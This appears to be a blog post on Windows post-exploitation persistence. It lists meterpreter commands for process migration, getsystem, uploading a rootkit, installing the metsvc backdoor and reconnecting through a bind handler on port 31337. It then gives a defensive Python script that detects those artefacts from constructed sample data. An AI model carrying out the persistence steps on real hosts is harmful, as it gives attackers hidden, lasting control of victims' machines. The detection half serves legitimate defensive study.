Let's change gears for a bit and talk about system and network access. Root or Admin access is all fine and good, but let's go to the System and Kernel level. If any of you have used rootkits, you know the power they have over the system. In this blog post I will cover the ways that rootkits can be used in conjunction with Metasploit to maintain access at the system and kernel level. First let's go over the scenario: you have exploited a Windows box through some exploit (for this document let's use the ms08_067_netapi exploit) and you have a meterpreter shell.
These are the steps I will cover to get system level first:
1) Dump the PIDs on the system and invade the process space of an existing process such as explorer.exe --> ps (dumps processes and PIDs) --> migrate <PID of explorer.exe> (moves the meterpreter session into that process)
2) Get system level access --> getsystem
3) Verify --> getuid
4) Upload our rootkit --> cd / --> cd windows/system32 --> "upload your favorite rootkit -> name of the file" (without the quotes; I had to use them because the meterpreter syntax for setting the file name looks the same as my arrows, with one less -)
5) Upload our meterpreter backdoor --> run metsvc
6) Drop to a command prompt and start our rootkit --> shell --> type the command you would normally use to start and interact with the rootkit (NOTE: configure the rootkit before you upload and execute it)
7) Verify all processes are hidden --> type exit --> ps --> we are good
8) Access your backdoor --> use exploit/multi/handler --> set payload windows/metsvc_bind_tcp --> set rhost "target address" --> set lport 31337 --> exploit
9) That quickly we are connected back to the meterpreter session, hidden in the kernel with the rootkit running, and we still have system level access!
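The steps above leave three things on the box that a defender can look for: a persistent service named metsvc, a bind listener on port 31337, and processes that the rootkit filters out of the normal process listing. The script below is an added example (mine, not from this post or from Metasploit) that runs those checks over constructed sample data: a cross-view diff between the process list the Windows API reports and a low-level PID enumeration the rootkit cannot filter, a parser for `netstat -ano` output that flags listeners on watched ports or owned by a PID that is not in the process listing, and a service-name check. The service name and port come from the steps above; the process names, PIDs and netstat lines are constructed samples. On a real host you would replace the constructed dictionaries with live output from tasklist, a PID brute-force with OpenProcess, netstat -ano and sc query.

```python
"""Defender-side checks for the metsvc + rootkit persistence described above.
All input data below is constructed sample data, not captured from a real host."""
import re

# Constructed sample: the filtered process view the Windows API returns (what `ps`
# or tasklist shows once the rootkit is hiding processes).
API_PROCESS_VIEW = {
    4: "System",
    524: "services.exe",
    1204: "explorer.exe",
    1688: "svchost.exe",
}

# Constructed sample: PIDs found by a low-level enumeration (for example probing
# every PID with OpenProcess, or scanning kernel memory), which a rootkit that only
# hooks the listing API cannot filter. 2312 and 2340 are the hidden processes.
LOW_LEVEL_PID_VIEW = {4, 524, 1204, 1688, 2312, 2340}

# Constructed sample of `netstat -ano` output in its real column layout.
NETSTAT_OUTPUT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       524
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:31337          0.0.0.0:0              LISTENING       2312
  TCP    10.0.0.5:49712         10.0.0.9:443           ESTABLISHED     1688
"""

# Constructed sample of installed services (name -> image path), as sc query or the
# registry would report them. The metsvc name is the one the post's `run metsvc` step
# installs; its path here is a constructed placeholder.
SERVICES = {
    "Dnscache": r"C:\Windows\system32\svchost.exe -k NetworkService",
    "metsvc": r"C:\Windows\system32\metsvc.exe",
}

SUSPICIOUS_SERVICE_NAMES = {"metsvc"}
SUSPICIOUS_PORTS = {31337}  # the bind port used in the handler step above

# Matches TCP rows of `netstat -ano`: proto, local addr, local port, foreign, state, pid.
_NETSTAT_ROW = re.compile(r"^\s*(TCP)\s+(\S+):(\d+)\s+(\S+)\s+(\S+)\s+(\d+)\s*$")


def hidden_pids(api_view, low_level_view):
    """Cross-view diff: a PID the low-level enumeration sees but the API listing
    does not is a process-hiding indicator. Returns the hidden PIDs sorted."""
    return sorted(set(low_level_view) - set(api_view))


def parse_netstat(text):
    """Parse `netstat -ano` TCP rows into dicts; header and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = _NETSTAT_ROW.match(line)
        if not m:
            continue
        proto, local, port, foreign, state, pid = m.groups()
        rows.append({"proto": proto, "local": local, "port": int(port),
                     "foreign": foreign, "state": state, "pid": int(pid)})
    return rows


def suspicious_listeners(netstat_text, api_view, watch_ports):
    """Flag listening sockets on watched ports, and any listener whose owning PID is
    missing from the process listing (a socket with no visible owner is a strong
    hiding indicator even when the port itself is unremarkable)."""
    findings = []
    for row in parse_netstat(netstat_text):
        if row["state"] != "LISTENING":
            continue
        reasons = []
        if row["port"] in watch_ports:
            reasons.append(f"listener on watched port {row['port']}")
        if row["pid"] not in api_view:
            reasons.append(f"owning PID {row['pid']} is not in the process listing")
        if reasons:
            findings.append({"port": row["port"], "pid": row["pid"], "reasons": reasons})
    return findings


def suspicious_services(services, watch_names):
    """Return installed service names (case-insensitive) that match the watch list."""
    wanted = {n.lower() for n in watch_names}
    return sorted(name for name in services if name.lower() in wanted)


def run_checks():
    """Run all three checks over the constructed samples and return the findings."""
    return {
        "hidden_pids": hidden_pids(API_PROCESS_VIEW, LOW_LEVEL_PID_VIEW),
        "listeners": suspicious_listeners(NETSTAT_OUTPUT, API_PROCESS_VIEW, SUSPICIOUS_PORTS),
        "services": suspicious_services(SERVICES, SUSPICIOUS_SERVICE_NAMES),
    }


if __name__ == "__main__":
    for check, result in run_checks().items():
        print(f"{check}: {result}")
```

The cross-view diff is the part worth keeping: a rootkit that hooks the process-listing API still has to leave the process schedulable and its sockets bound, so comparing what the API admits to against what the kernel actually holds (PIDs, listening sockets, service entries) is how the hidden processes from step 7 get surfaced.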